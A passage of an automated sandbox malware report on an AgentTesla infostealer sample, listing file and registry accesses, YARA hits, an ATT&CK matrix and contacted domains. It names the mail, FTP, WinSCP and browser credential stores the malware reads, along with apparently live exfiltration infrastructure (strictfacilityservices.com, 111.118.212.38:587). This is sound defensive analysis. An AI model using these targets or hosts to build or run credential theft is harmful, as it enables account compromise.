              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
              Yara detected AgentTesla
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nrQtAokXKaSn.exe PID: 1008, type: MEMORYSTR
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: Yara matchFile source: 0000000B.00000002.532293061.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.533369231.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nrQtAokXKaSn.exe PID: 1008, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected AgentTesla
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nrQtAokXKaSn.exe PID: 1008, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts211
              Windows Management Instrumentation              		1
              Scheduled Task/Job              		111
              Process Injection              		1
              Disable or Modify Tools              		2
              OS Credential Dumping              		1
              File and Directory Discovery              		Remote Services11
              Archive Collected Data              		Exfiltration Over Other Network Medium1
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Native API              		Boot or Logon Initialization Scripts1
              Scheduled Task/Job              		1
              Deobfuscate/Decode Files or Information              		11
              Input Capture              		114
              System Information Discovery              		Remote Desktop Protocol2
              Data from Local System              		Exfiltration Over Bluetooth11
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts1
              Scheduled Task/Job              		Logon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information              		1
              Credentials in Registry              		311
              Security Software Discovery              		SMB/Windows Admin Shares1
              Email Collection              		Automated Exfiltration1
              Non-Standard Port              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)23
              Software Packing              		NTDS1
              Process Discovery              		Distributed Component Object Model11
              Input Capture              		Scheduled Transfer2
              Non-Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets131
              Virtualization/Sandbox Evasion              		SSH1
              Clipboard Data              		Data Transfer Size Limits23
              Application Layer Protocol              		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common131
              Virtualization/Sandbox Evasion              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items111
              Process Injection              		DCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              System Network Configuration Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 756116 Sample: SecuriteInfo.com.Win32.Cryp... Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 49 Snort IDS alert for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Sigma detected: Scheduled temp file as task from temp location 2->53 55 9 other signatures 2->55 7 nrQtAokXKaSn.exe 5 2->7         started        10 SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe 6 2->10         started        process3 file4 57 Multi AV Scanner detection for dropped file 7->57 59 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->59 61 May check the online IP address of the machine 7->61 63 Machine Learning detection for dropped file 7->63 13 nrQtAokXKaSn.exe 14 3 7->13         started        17 schtasks.exe 1 7->17         started        19 nrQtAokXKaSn.exe 7->19         started        31 C:\Users\user\AppData\...\nrQtAokXKaSn.exe, PE32 10->31 dropped 33 C:\Users\user\AppData\Local\...\tmp152E.tmp, XML 10->33 dropped 35 SecuriteInfo.com.W....16043.3621.exe.log, ASCII 10->35 dropped 65 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 10->65 67 Uses schtasks.exe or at.exe to add and modify task schedules 10->67 69 Injects a PE file into a foreign processes 10->69 21 SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe 15 3 10->21         started        23 schtasks.exe 1 10->23         started        25 SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe 10->25         started        signatures5 process6 dnsIp7 37 mail.strictfacilityservices.com 13->37 39 3.232.242.170, 443, 49720 AMAZON-AESUS United States 13->39 41 api.ipify.org 13->41 71 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->71 73 Tries to steal Mail credentials (via file / registry access) 13->73 75 Tries to harvest and steal ftp login credentials 13->75 77 Tries to harvest and steal browser information (history, passwords, etc) 13->77 27 conhost.exe 17->27         started        43 strictfacilityservices.com 111.118.212.38, 49717, 49722, 587 PUBLIC-DOMAIN-REGISTRYUS India 21->43 45 mail.strictfacilityservices.com 21->45 47 2 other IPs or domains 21->47 79 Installs a global keyboard hook 21->79 29 conhost.exe 23->29         started        signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe32%ReversingLabsWin32.Trojan.AgentTesla
              SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe32%ReversingLabsWin32.Trojan.AgentTesla

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://www.fontbureau.comdH-u0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/s-P0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/jp/&-c0%Avira URL Cloudsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.carterandcone.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://strictfacilityservices.com0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/Y0010%Avira URL Cloudsafe
              http://www.galapagosdesign.com/staff/dennis.htm/0%Avira URL Cloudsafe
              https://api.ipify.orgmail.strictfacilityservices.comaccounts0%Avira URL Cloudsafe
              http://UrUbMY.com0%Avira URL Cloudsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.fontbureau.comgrita0%URL Reputationsafe
              http://www.fontbureau.comB.TTF0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm20%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/--0%Avira URL Cloudsafe
              http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.fontbureau.comd--0%Avira URL Cloudsafe
              http://www.ascendercorp.com/typedesigners.html/0%Avira URL Cloudsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.de0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.fontbureau.coms-P0%Avira URL Cloudsafe
              http://www.founder.com.cn/cn/d0%Avira URL Cloudsafe
              http://www.fontbureau.comrsiv_-l0%Avira URL Cloudsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.fontbureau.com.TTF0%URL Reputationsafe
              http://www.fontbureau.comml-Y0%Avira URL Cloudsafe
              http://www.fontbureau.comasF;-0%Avira URL Cloudsafe
              http://www.carterandcone.com%(0%Avira URL Cloudsafe
              http://www.fontbureau.comalsd0%URL Reputationsafe
              http://www.galapagosdesign.com/0%URL Reputationsafe
              http://www.fontbureau.comF0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/P0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
              http://www.fontbureau.comd0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.urwpp.deeg0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.fontbureau.comoitu0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/t0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.zhongyicts.com.cno.0%URL Reputationsafe
              http://www.fontbureau.comE.TTF0%URL Reputationsafe
              http://mail.strictfacilityservices.com0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/H-u0%Avira URL Cloudsafe
              http://www.fontbureau.comd&-c0%Avira URL Cloudsafe
              http://www.fontbureau.comcomt0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/;-0%Avira URL Cloudsafe
              http://www.fontbureau.comdf0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/&-c0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/_-l0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/jp/--0%Avira URL Cloudsafe
              https://OPBeIPZ8XbJqLOvY6X.net0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              api.ipify.org.herokudns.com
              		52.20.78.240
              		truefalse
                		unknown
                strictfacilityservices.com
                		111.118.212.38
                		truetrue
                  		unknown
                  api.ipify.org
                  		unknown
                  		unknownfalse
                    		high
                    mail.strictfacilityservices.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://UrUbMY.comnrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.jiyu-kobo.co.jp/s-PSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.comdH-uSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/jp/&-cSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://strictfacilityservices.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538758099.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539377168.0000000002B6E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.tiro.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Y001SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.ipify.orgmail.strictfacilityservices.comaccountsnrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
